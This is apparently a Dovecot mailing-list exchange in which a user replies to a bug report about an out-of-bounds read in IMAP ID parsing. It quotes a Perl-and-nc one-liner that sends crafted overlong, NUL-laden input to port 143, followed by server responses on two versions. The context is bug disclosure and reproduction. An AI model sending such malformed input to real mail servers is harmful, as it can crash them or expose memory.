4 Sep
2019
4 Sep
'19
1:22 a.m.
On 2019.09.03. 22:32, KSB via dovecot wrote:
On 2019.08.28. 15:10, Aki Tuomi via dovecot wrote:
Steps to reproduce:
This bug is best observed using valgrind to see the out of bounds read with following snippet:
perl -e 'print "a id (\"foo\" \"".("x"x1021)."\\A\" \"bar\" \"\000".("x"x1020)."\\A\")\n"' | nc localhost 143
Hi! Before I had 2.2.25 and returned result was:
- OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready. a BAD Missing ')'
now I upgraded to 2.2.36.4 and the result is the same.
-- KSB
Btw, got 1 time: perl -e 'print "a id (\"foo\" \"".("x"x1021)."\\A\" \"bar\" \"\000".("x"x1020)."\\A\")\n"' | nc localhost 143
- OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE STARTTLS AUTH=PLAIN AUTH=LOGIN] Dovecot ready. a BAD Missing ')'
- BYE Input buffer full, aborting
with 2.2.36.4
-- KSB